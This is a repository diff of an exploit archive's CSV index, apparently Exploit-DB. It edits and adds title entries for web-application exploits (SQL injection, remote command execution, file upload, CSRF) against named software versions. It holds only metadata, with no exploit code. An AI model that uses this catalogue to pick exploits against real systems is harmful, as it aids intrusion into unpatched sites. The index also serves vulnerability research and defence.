754,exploits/php/webapps/754.pl,"ITA Forum 1.49 - SQL Injection",2005-01-13,RusH,webapps,php,
|
||||
772,exploits/cgi/webapps/772.c,"AWStats 6.0 < 6.2 - configdir Remote Command Execution (C)",2005-01-25,THUNDER,webapps,cgi,
|
||||
773,exploits/cgi/webapps/773.pl,"AWStats 6.0 < 6.2 - configdir Remote Command Execution (Perl)",2005-01-25,GHC,webapps,cgi,
|
||||
772,exploits/cgi/webapps/772.c,"AWStats 6.0 < 6.2 - 'configdir' Remote Command Execution (C)",2005-01-25,THUNDER,webapps,cgi,
|
||||
773,exploits/cgi/webapps/773.pl,"AWStats 6.0 < 6.2 - 'configdir' Remote Command Execution (Perl)",2005-01-25,GHC,webapps,cgi,
|
||||
774,exploits/php/webapps/774.pl,"Siteman 1.1.10 - Remote Administrative Account Addition",2005-01-25,"Noam Rathaus",webapps,php,
|
||||
786,exploits/php/webapps/786.pl,"LiteForum 2.1.1 - SQL Injection",2005-02-04,RusH,webapps,php,
|
||||
790,exploits/cgi/webapps/790.pl,"PerlDesk 1.x - SQL Injection",2005-02-05,deluxe89,webapps,cgi,
|
||||
|
@ -16783,15 +16783,15 @@ id,file,description,date,author,type,platform,port
|
|||
1329,exploits/php/webapps/1329.php,"EkinBoard 1.0.3 - '/config.php' SQL Injection / Command Execution",2005-11-17,rgod,webapps,php,
|
||||
1337,exploits/php/webapps/1337.php,"Mambo 4.5.2 - Globals Overwrite / Remote Command Execution",2005-11-22,rgod,webapps,php,
|
||||
1340,exploits/php/webapps/1340.php,"eFiction 2.0 - Fake '.GIF' Arbitrary File Upload",2005-11-25,rgod,webapps,php,
|
||||
1342,exploits/php/webapps/1342.php,"Guppy 4.5.9 - 'REMOTE_ADDR' Remote Commands Execution",2005-11-28,rgod,webapps,php,
|
||||
1342,exploits/php/webapps/1342.php,"Guppy 4.5.9 - 'REMOTE_ADDR' Remote Command Execution",2005-11-28,rgod,webapps,php,
|
||||
1354,exploits/php/webapps/1354.php,"Zen Cart 1.2.6d - 'password_forgotten.php' SQL Injection",2005-12-02,rgod,webapps,php,
|
||||
1356,exploits/php/webapps/1356.php,"DoceboLms 2.0.4 - 'connector.php' Arbitrary File Upload",2005-12-04,rgod,webapps,php,
|
||||
1358,exploits/php/webapps/1358.php,"SimpleBBS 1.1 - Remote Commands Execution",2005-12-06,rgod,webapps,php,
|
||||
1358,exploits/php/webapps/1358.php,"SimpleBBS 1.1 - Remote Command Execution",2005-12-06,rgod,webapps,php,
|
||||
1359,exploits/php/webapps/1359.php,"SugarSuite Open Source 4.0beta - Remote Code Execution (1)",2005-12-07,rgod,webapps,php,
|
||||
1361,exploits/php/webapps/1361.c,"SimpleBBS 1.1 - Remote Commands Execution (C)",2005-12-07,unitedasia,webapps,php,
|
||||
1361,exploits/php/webapps/1361.c,"SimpleBBS 1.1 - Remote Command Execution (C)",2005-12-07,unitedasia,webapps,php,
|
||||
1363,exploits/php/webapps/1363.php,"Website Baker 2.6.0 - Authentication Bypass / Remote Code Execution",2005-12-08,rgod,webapps,php,
|
||||
1364,exploits/php/webapps/1364.c,"SugarSuite Open Source 4.0beta - Remote Code Execution (2)",2005-12-08,pointslash,webapps,php,
|
||||
1367,exploits/php/webapps/1367.php,"Flatnuke 2.5.6 - Privilege Escalation / Remote Commands Execution",2005-12-10,rgod,webapps,php,
|
||||
1367,exploits/php/webapps/1367.php,"Flatnuke 2.5.6 - Privilege Escalation / Remote Command Execution",2005-12-10,rgod,webapps,php,
|
||||
1370,exploits/php/webapps/1370.php,"phpCOIN 1.2.2 - 'phpcoinsessid' SQL Injection / Remote Code Execution",2005-12-12,rgod,webapps,php,
|
||||
1373,exploits/php/webapps/1373.php,"Limbo 1.0.4.2 - '_SERVER[REMOTE_ADDR]' Remote Command Execution",2005-12-14,rgod,webapps,php,
|
||||
1379,exploits/php/webapps/1379.php,"PHPGedView 3.3.7 - Remote Code Execution",2005-12-20,rgod,webapps,php,
|
||||
|
@ -16799,8 +16799,8 @@ id,file,description,date,author,type,platform,port
|
|||
1383,exploits/php/webapps/1383.txt,"phpBB 2.0.18 - Cross-Site Scripting / Cookie Disclosure",2005-12-21,jet,webapps,php,
|
||||
1385,exploits/php/webapps/1385.pl,"PHP-Fusion 6.00.3 - 'rating' SQL Injection",2005-12-23,krasza,webapps,php,
|
||||
1387,exploits/php/webapps/1387.php,"Dev Web Management System 1.5 - 'cat' SQL Injection",2005-12-24,rgod,webapps,php,
|
||||
1388,exploits/php/webapps/1388.pl,"phpBB 2.0.17 - 'signature_bbcode_uid' Remote Command",2005-12-24,RusH,webapps,php,
|
||||
1395,exploits/php/webapps/1395.php,"phpDocumentor 1.3.0 rc4 - Remote Commands Execution",2005-12-29,rgod,webapps,php,
|
||||
1388,exploits/php/webapps/1388.pl,"phpBB 2.0.17 - 'signature_bbcode_uid' Remot Command",2005-12-24,RusH,webapps,php,
|
||||
1395,exploits/php/webapps/1395.php,"phpDocumentor 1.3.0 rc4 - Remote Command Execution",2005-12-29,rgod,webapps,php,
|
||||
1398,exploits/php/webapps/1398.pl,"CubeCart 3.0.6 - Remote Command Execution",2005-12-30,cijfer,webapps,php,
|
||||
1399,exploits/asp/webapps/1399.txt,"WebWiz Products 1.0/3.06 - Authentication Bypass / SQL Injection",2005-12-30,DevilBox,webapps,asp,
|
||||
1400,exploits/php/webapps/1400.pl,"CuteNews 1.4.1 - 'categories.mdu' Remote Command Execution",2006-01-01,cijfer,webapps,php,
|
||||
|
@ -16820,26 +16820,26 @@ id,file,description,date,author,type,platform,port
|
|||
1469,exploits/php/webapps/1469.pl,"phpBB 2.0.19 - Style Changer/Demo Mod SQL Injection",2006-02-05,SkOd,webapps,php,
|
||||
1471,exploits/cgi/webapps/1471.pl,"MyQuiz 1.01 - 'PATH_INFO' Arbitrary Command Execution",2006-02-06,Hessam-x,webapps,cgi,
|
||||
1472,exploits/asp/webapps/1472.pl,"ASPThai.Net Guestbook 5.5 - Authentication Bypass",2006-02-06,Zodiac,webapps,asp,
|
||||
1478,exploits/php/webapps/1478.php,"CPGNuke Dragonfly 9.0.6.1 - Remote Commands Execution",2006-02-08,rgod,webapps,php,
|
||||
1482,exploits/php/webapps/1482.php,"SPIP 1.8.2g - Remote Commands Execution",2006-02-08,rgod,webapps,php,
|
||||
1478,exploits/php/webapps/1478.php,"CPGNuke Dragonfly 9.0.6.1 - Remote Command Execution",2006-02-08,rgod,webapps,php,
|
||||
1482,exploits/php/webapps/1482.php,"SPIP 1.8.2g - Remote Command Execution",2006-02-08,rgod,webapps,php,
|
||||
1484,exploits/php/webapps/1484.php,"FCKEditor 2.0 < 2.2 - 'FileManager connector.php' Arbitrary File Upload",2006-02-09,rgod,webapps,php,
|
||||
1485,exploits/php/webapps/1485.php,"RunCMS 1.2 - 'class.forumposts.php' Remote File Inclusion",2006-02-09,rgod,webapps,php,
|
||||
1491,exploits/php/webapps/1491.php,"DocMGR 0.54.2 - 'file_exists' Remote Commands Execution",2006-02-11,rgod,webapps,php,
|
||||
1491,exploits/php/webapps/1491.php,"DocMGR 0.54.2 - 'file_exists' Remote Command Execution",2006-02-11,rgod,webapps,php,
|
||||
1492,exploits/php/webapps/1492.php,"Invision Power Board Army System Mod 2.1 - SQL Injection",2006-02-13,fRoGGz,webapps,php,
|
||||
1493,exploits/php/webapps/1493.php,"EnterpriseGS 1.0 rc4 - Remote Commands Execution",2006-02-13,rgod,webapps,php,
|
||||
1494,exploits/php/webapps/1494.php,"FlySpray 0.9.7 - 'install-0.9.7.php' Remote Commands Execution",2006-02-13,rgod,webapps,php,
|
||||
1493,exploits/php/webapps/1493.php,"EnterpriseGS 1.0 rc4 - Remote Command Execution",2006-02-13,rgod,webapps,php,
|
||||
1494,exploits/php/webapps/1494.php,"FlySpray 0.9.7 - 'install-0.9.7.php' Remote Command Execution",2006-02-13,rgod,webapps,php,
|
||||
1498,exploits/php/webapps/1498.php,"webSPELL 4.01 - 'title_op' SQL Injection",2006-02-14,x128,webapps,php,
|
||||
1499,exploits/php/webapps/1499.pl,"MyBulletinBoard (MyBB) 1.03 - Multiple SQL Injections",2006-02-15,"HACKERS PAL",webapps,php,
|
||||
1501,exploits/php/webapps/1501.php,"PHPKIT 1.6.1R2 - 'filecheck' Remote Commands Execution",2006-02-16,rgod,webapps,php,
|
||||
1501,exploits/php/webapps/1501.php,"PHPKIT 1.6.1R2 - 'filecheck' Remote Command Execution",2006-02-16,rgod,webapps,php,
|
||||
1503,exploits/php/webapps/1503.pl,"YapBB 1.2 - 'cfgIncludeDirectory' Remote Command Execution",2006-02-16,cijfer,webapps,php,
|
||||
1508,exploits/cgi/webapps/1508.pl,"AWStats < 6.4 - 'referer' Remote Command Execution",2006-02-17,RusH,webapps,cgi,
|
||||
1509,exploits/php/webapps/1509.pl,"Zorum Forum 3.5 - 'rollid' SQL Injection",2006-02-17,RusH,webapps,php,
|
||||
1510,exploits/php/webapps/1510.pl,"Gravity Board X 1.1 - 'csscontent' Remote Code Execution",2006-02-17,RusH,webapps,php,
|
||||
1511,exploits/php/webapps/1511.php,"Coppermine Photo Gallery 1.4.3 - Remote Commands Execution",2006-02-17,rgod,webapps,php,
|
||||
1511,exploits/php/webapps/1511.php,"Coppermine Photo Gallery 1.4.3 - Remote Command Execution",2006-02-17,rgod,webapps,php,
|
||||
1512,exploits/php/webapps/1512.pl,"Admbook 1.2.2 - 'x-forwarded-for' Remote Command Execution",2006-02-19,rgod,webapps,php,
|
||||
1513,exploits/php/webapps/1513.php,"BXCP 0.2.9.9 - 'tid' SQL Injection",2006-02-19,x128,webapps,php,
|
||||
1514,exploits/asp/webapps/1514.pl,"MiniNuke 1.8.2b - 'pages.asp' SQL Injection",2006-02-19,nukedx,webapps,asp,
|
||||
1515,exploits/php/webapps/1515.pl,"GeekLog 1.x - 'error.log' (gpc = Off) Remote Commands Execution",2006-02-20,rgod,webapps,php,
|
||||
1515,exploits/php/webapps/1515.pl,"GeekLog 1.x - 'error.log' Remote Command Execution",2006-02-20,rgod,webapps,php,
|
||||
1516,exploits/php/webapps/1516.php,"ilchClan 1.05g - 'tid' SQL Injection",2006-02-20,x128,webapps,php,
|
||||
1521,exploits/php/webapps/1521.php,"Noahs Classifieds 1.3 - 'lowerTemplate' Remote Code Execution",2006-02-22,trueend5,webapps,php,
|
||||
1522,exploits/php/webapps/1522.php,"NOCC Webmail 1.0 - Local File Inclusion / Remote Code Execution",2006-02-23,rgod,webapps,php,
|
||||
|
@ -16862,14 +16862,14 @@ id,file,description,date,author,type,platform,port
|
|||
1546,exploits/php/webapps/1546.pl,"phpRPC Library 0.7 - XML Data Decoding Remote Code Execution (2)",2006-03-02,cijfer,webapps,php,
|
||||
1547,exploits/php/webapps/1547.txt,"Aztek Forum 4.00 - Cross-Site Scripting / SQL Injection",2006-03-02,lorenzo,webapps,php,
|
||||
1548,exploits/php/webapps/1548.pl,"MyBulletinBoard (MyBB) 1.04 - 'misc.php' SQL Injection (2)",2006-03-03,Devil-00,webapps,php,
|
||||
1549,exploits/php/webapps/1549.php,"PHP-Stats 0.1.9.1 - Remote Commands Execution",2006-03-04,rgod,webapps,php,
|
||||
1549,exploits/php/webapps/1549.php,"PHP-Stats 0.1.9.1 - Remote Commans Execution",2006-03-04,rgod,webapps,php,
|
||||
1550,exploits/asp/webapps/1550.txt,"TotalECommerce 1.0 - 'index.asp?id' SQL Injection",2006-03-04,nukedx,webapps,asp,
|
||||
1553,exploits/php/webapps/1553.pl,"Fantastic News 2.1.2 - 'script_path' Remote Code Execution",2006-03-04,uid0,webapps,php,
|
||||
1556,exploits/php/webapps/1556.pl,"D2-Shoutbox 4.2 IPB Mod - 'load' SQL Injection",2006-03-06,SkOd,webapps,php,
|
||||
1561,exploits/php/webapps/1561.pl,"OWL Intranet Engine 0.82 - 'xrms_file_root' Code Execution",2006-03-07,rgod,webapps,php,
|
||||
1562,exploits/asp/webapps/1562.pl,"CilemNews System 1.1 - 'yazdir.asp' haber_id SQL Injection",2006-03-07,nukedx,webapps,asp,
|
||||
1563,exploits/php/webapps/1563.pm,"Limbo CMS 1.0.4.2 - 'itemID' Remote Code Execution (Metasploit)",2006-03-07,sirh0t,webapps,php,
|
||||
1566,exploits/php/webapps/1566.php,"Gallery 2.0.3 - stepOrder[] Remote Commands Execution",2006-03-08,rgod,webapps,php,
|
||||
1566,exploits/php/webapps/1566.php,"Gallery 2.0.3 - 'stepOrder[]' Remote Command Execution",2006-03-08,rgod,webapps,php,
|
||||
1567,exploits/php/webapps/1567.php,"RedBLoG 0.5 - 'cat_id' SQL Injection",2006-03-08,x128,webapps,php,
|
||||
1569,exploits/asp/webapps/1569.pl,"d2kBlog 1.0.3 - 'memName' SQL Injection",2006-03-09,DevilBox,webapps,asp,
|
||||
1570,exploits/php/webapps/1570.pl,"Light Weight Calendar 1.x - 'date' Remote Code Execution",2006-03-09,Hessam-x,webapps,php,
|
||||
|
@ -16915,18 +16915,18 @@ id,file,description,date,author,type,platform,port
|
|||
1654,exploits/php/webapps/1654.txt,"autonomous lan party 0.98.1.0 - Remote File Inclusion",2006-04-09,Codexploder,webapps,php,
|
||||
1655,exploits/php/webapps/1655.php,"XBrite Members 1.1 - 'id' SQL Injection",2006-04-09,snatcher,webapps,php,
|
||||
1656,exploits/php/webapps/1656.txt,"Sire 2.0 - '/lire.php' Remote File Inclusion / Arbitrary File Upload",2006-04-09,simo64,webapps,php,
|
||||
1659,exploits/php/webapps/1659.php,"phpList 2.10.2 - GLOBALS[] Remote Code Execution",2006-04-10,rgod,webapps,php,
|
||||
1659,exploits/php/webapps/1659.php,"phpList 2.10.2 - 'GLOBALS[]' Remote Code Execution",2006-04-10,rgod,webapps,php,
|
||||
1660,exploits/php/webapps/1660.pm,"Horde 3.0.9/3.1.0 - Help Viewer Remote Code Execution (Metasploit)",2006-04-10,Inkubus,webapps,php,
|
||||
1661,exploits/php/webapps/1661.pl,"phpBB 2.0.19 - 'user_sig_bbcode_uid' Remote Code Execution",2006-04-10,RusH,webapps,php,
|
||||
1662,exploits/php/webapps/1662.php,"Clansys 1.1 (showid) - SQL Injection",2006-04-10,snatcher,webapps,php,
|
||||
1663,exploits/php/webapps/1663.php,"Simplog 0.9.2 - 's' Remote Commands Execution",2006-04-11,rgod,webapps,php,
|
||||
1663,exploits/php/webapps/1663.php,"Simplog 0.9.2 - 's' Remote Command Execution",2006-04-11,rgod,webapps,php,
|
||||
1665,exploits/php/webapps/1665.pl,"Sphider 1.3 - 'configset.php' Remote File Inclusion",2006-04-12,rgod,webapps,php,
|
||||
1666,exploits/php/webapps/1666.php,"PHP121 Instant Messenger 1.4 - Remote Code Execution",2006-04-12,rgod,webapps,php,
|
||||
1668,exploits/php/webapps/1668.php,"vBulletin ImpEx 1.74 - Remote Command Execution",2006-04-13,ReZEN,webapps,php,
|
||||
1669,exploits/cgi/webapps/1669.pl,"Censtore 7.3.x - 'censtore.cgi' Remote Command Execution",2006-04-13,FOX_MULDER,webapps,cgi,
|
||||
1670,exploits/cgi/webapps/1670.pl,"quizz 1.01 - 'quizz.pl' Remote Command Execution",2006-04-13,FOX_MULDER,webapps,cgi,
|
||||
1672,exploits/php/webapps/1672.pl,"PAJAX 0.5.1 - Remote Code Execution",2006-04-13,Stoney,webapps,php,
|
||||
1673,exploits/php/webapps/1673.php,"phpWebSite 0.10.2 - 'hub_dir' Remote Commands Execution",2006-04-14,rgod,webapps,php,
|
||||
1673,exploits/php/webapps/1673.php,"phpWebSite 0.10.2 - 'hub_dir' Remote Command Execution",2006-04-14,rgod,webapps,php,
|
||||
1674,exploits/php/webapps/1674.txt,"osCommerce 2.2 - 'extras' Source Code Disclosure",2006-04-14,rgod,webapps,php,
|
||||
1677,exploits/cgi/webapps/1677.php,"SysInfo 1.21 - 'sysinfo.cgi' Remote Command Execution",2006-04-14,rgod,webapps,cgi,
|
||||
1678,exploits/php/webapps/1678.php,"PHP Album 0.3.2.3 - Remote Command Execution",2006-04-15,rgod,webapps,php,
|
||||
|
@ -17325,7 +17325,7 @@ id,file,description,date,author,type,platform,port
|
|||
2267,exploits/cgi/webapps/2267.txt,"Cybuzu Garoon 2.1.0 - Multiple SQL Injections",2006-08-28,"Tan Chew Keong",webapps,cgi,
|
||||
2268,exploits/php/webapps/2268.php,"e107 < 0.75 - GLOBALS Overwrite Remote Code Execution",2006-08-28,rgod,webapps,php,
|
||||
2269,exploits/php/webapps/2269.txt,"Web3news 0.95 - 'PHPSECURITYADMIN_PATH' Remote File Inclusion",2006-08-28,SHiKaA,webapps,php,
|
||||
2270,exploits/php/webapps/2270.php,"phpGroupWare 0.9.16.010 - GLOBALS[] Remote Code Execution",2006-08-29,Kacper,webapps,php,
|
||||
2270,exploits/php/webapps/2270.php,"phpGroupWare 0.9.16.010 - 'GLOBALS[]' Remote Code Execution",2006-08-29,Kacper,webapps,php,
|
||||
2271,exploits/php/webapps/2271.txt,"PortailPHP mod_phpalbum 2.1.5 - 'chemin' Remote File Inclusion",2006-08-29,"Mehmet Ince",webapps,php,
|
||||
2272,exploits/php/webapps/2272.txt,"MiniBill 1.22b - config[plugin_dir] Remote File Inclusion",2006-08-29,"the master",webapps,php,
|
||||
2273,exploits/php/webapps/2273.txt,"ExBB Italiano 0.2 - exbb[home_path] Remote File Inclusion",2006-08-29,SHiKaA,webapps,php,
|
||||
|
@ -18011,7 +18011,7 @@ id,file,description,date,author,type,platform,port
|
|||
3215,exploits/php/webapps/3215.pl,"Foro Domus 2.10 - 'phpbb_root_path' Remote File Inclusion",2007-01-28,"Mehmet Ince",webapps,php,
|
||||
3216,exploits/php/webapps/3216.txt,"xNews 1.3 - 'xNews.php' SQL Injection",2007-01-28,ajann,webapps,php,
|
||||
3217,exploits/php/webapps/3217.txt,"PHP Generic library & Framework - 'INCLUDE_PATH' Remote File Inclusion",2007-01-28,"Mehmet Ince",webapps,php,
|
||||
3221,exploits/php/webapps/3221.php,"GuppY 4.5.16 - Remote Commands Execution",2007-01-29,rgod,webapps,php,
|
||||
3221,exploits/php/webapps/3221.php,"GuppY 4.5.16 - Remote Command Execution",2007-01-29,rgod,webapps,php,
|
||||
3222,exploits/php/webapps/3222.txt,"Webfwlog 0.92 - 'debug.php' Remote File Disclosure",2007-01-29,GoLd_M,webapps,php,
|
||||
3225,exploits/php/webapps/3225.pl,"Galeria Zdjec 3.0 - 'zd_numer.php' Local File Inclusion",2007-01-30,ajann,webapps,php,
|
||||
3226,exploits/php/webapps/3226.txt,"PHPFootball 1.6 - Remote Database Disclosure",2007-01-30,ajann,webapps,php,
|
||||
|
@ -25325,7 +25325,7 @@ id,file,description,date,author,type,platform,port
|
|||
16901,exploits/php/webapps/16901.rb,"PAJAX - Remote Command Execution (Metasploit)",2010-04-30,Metasploit,webapps,php,
|
||||
16902,exploits/php/webapps/16902.rb,"CakePHP 1.3.5/1.2.8 - Cache Corruption (Metasploit)",2011-01-14,Metasploit,webapps,php,
|
||||
16904,exploits/php/webapps/16904.rb,"Fonality trixbox CE 2.6.1 - 'langChoice' Local File Inclusion (Metasploit)",2011-01-08,Metasploit,webapps,php,
|
||||
16905,exploits/cgi/webapps/16905.rb,"AWStats 6.1 < 6.2 - configdir Remote Command Execution (Metasploit)",2009-12-26,Metasploit,webapps,cgi,
|
||||
16905,exploits/cgi/webapps/16905.rb,"AWStats 6.1 < 6.2 - 'configdir' Remote Command Execution (Metasploit)",2009-12-26,Metasploit,webapps,cgi,
|
||||
16906,exploits/php/webapps/16906.rb,"Joomla! Plugin tinybrowser 1.5.12 - Arbitrary File Upload / Code Execution (Metasploit)",2010-06-15,Metasploit,webapps,php,
|
||||
16907,exploits/hardware/webapps/16907.rb,"Google Appliance ProxyStyleSheet - Command Execution (Metasploit)",2010-07-01,Metasploit,webapps,hardware,
|
||||
16908,exploits/cgi/webapps/16908.rb,"Nagios3 - 'statuswml.cgi' 'Ping' Command Execution (Metasploit)",2010-07-14,Metasploit,webapps,cgi,
|
||||
|
@ -26674,7 +26674,7 @@ id,file,description,date,author,type,platform,port
|
|||
21742,exploits/php/webapps/21742.txt,"Template CMS 2.1.1 - Multiple Vulnerabilities",2012-10-04,"High-Tech Bridge SA",webapps,php,
|
||||
21743,exploits/php/webapps/21743.txt,"phpMyBitTorrent 2.04 - Multiple Vulnerabilities",2012-10-04,waraxe,webapps,php,
|
||||
21744,exploits/windows/webapps/21744.txt,"Novell Sentinel Log Manager 1.2.0.2 - Retention Policy",2012-10-04,"Piotr Chmylkowski",webapps,windows,
|
||||
21745,exploits/php/webapps/21745.txt,"Achievo 0.7/0.8/0.9 - Remote File Inclusion Command Execution",2002-08-22,"Jeroen Latour",webapps,php,
|
||||
21745,exploits/php/webapps/21745.txt,"Achievo 0.7/0.8/0.9 - Remote File Inclusion / Command Execution",2002-08-22,"Jeroen Latour",webapps,php,
|
||||
21755,exploits/php/webapps/21755.txt,"PHPReactor 1.2.7 - Style Attribute HTML Injection",2002-08-24,"Matthew Murphy",webapps,php,
|
||||
21766,exploits/asp/webapps/21766.txt,"FactoSystem Weblog 0.9/1.0/1.1 - Multiple SQL Injections",2002-08-31,"Matthew Murphy",webapps,asp,
|
||||
21768,exploits/cgi/webapps/21768.txt,"Super Site Searcher - Remote Command Execution",2002-09-03,luca.ercoli,webapps,cgi,
|
||||
|
@ -27276,7 +27276,7 @@ id,file,description,date,author,type,platform,port
|
|||
23440,exploits/asp/webapps/23440.txt,"elektropost episerver 3/4 - Multiple Vulnerabilities",2003-12-15,babbelbubbel,webapps,asp,
|
||||
23443,exploits/php/webapps/23443.txt,"Aardvark Topsites 4.1 PHP - Multiple Vulnerabilities",2003-12-16,JeiAr,webapps,php,
|
||||
23445,exploits/php/webapps/23445.txt,"osCommerce 2.2 - 'osCsid' Cross-Site Scripting",2003-12-17,JeiAr,webapps,php,
|
||||
23447,exploits/cgi/webapps/23447.txt,"SiteInteractive Subscribe Me - Setup.pl Arbitrary Command Execution",2003-12-18,"Paul Craig",webapps,cgi,
|
||||
23447,exploits/cgi/webapps/23447.txt,"SiteInteractive Subscribe Me - 'Setup.pl' Arbitrary Command Execution",2003-12-18,"Paul Craig",webapps,cgi,
|
||||
23448,exploits/php/webapps/23448.php,"PHPWCMS 1.5.4.6 - 'preg_replace' Multiple Vulnerabilities",2012-12-17,aeon,webapps,php,
|
||||
23453,exploits/php/webapps/23453.txt,"BES-CMS 0.4/0.5 - 'index.inc.php' File Inclusion",2003-12-20,frog,webapps,php,
|
||||
23454,exploits/php/webapps/23454.txt,"BES-CMS 0.4/0.5 - '/members/index.inc.php' File Inclusion",2003-12-20,frog,webapps,php,
|
||||
|
@ -39600,3 +39600,8 @@ id,file,description,date,author,type,platform,port
|
|||
44938,exploits/hardware/webapps/44938.txt,"Ecessa ShieldLink SL175EHQ < 10.7.4 - Cross-Site Request Forgery (Add Superuser)",2018-06-25,LiquidWorm,webapps,hardware,443
|
||||
44939,exploits/hardware/webapps/44939.txt,"Intex Router N-150 - Arbitrary File Upload",2018-06-25,"Samrat Das",webapps,hardware,
|
||||
44940,exploits/php/webapps/44940.txt,"WordPress Plugin Comments Import & Export < 2.0.4 - CSV Injection",2018-06-25,"Bhushan B. Patil",webapps,php,80
|
||||
44952,exploits/php/webapps/44952.html,"BEESCMS 4.0 - Cross-Site Request Forgery (Add Admin)",2018-06-28,bay0net,webapps,php,80
|
||||
44953,exploits/php/webapps/44953.txt,"HongCMS 3.0.0 - SQL Injection",2018-06-28,Hzllaga,webapps,php,
|
||||
44954,exploits/php/webapps/44954.txt,"hycus CMS 1.0.4 - Authentication Bypass",2018-06-28,"Berk Dusunur",webapps,php,
|
||||
44955,exploits/hardware/webapps/44955.txt,"DIGISOL DG-HR3400 Wireless Router - Cross-Site Scripting",2018-06-28,"Adipta Basu",webapps,hardware,80
|
||||
44956,exploits/hardware/webapps/44956.py,"Cisco Adaptive Security Appliance - Path Traversal",2018-06-28,"Yassine Aboukir",webapps,hardware,
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue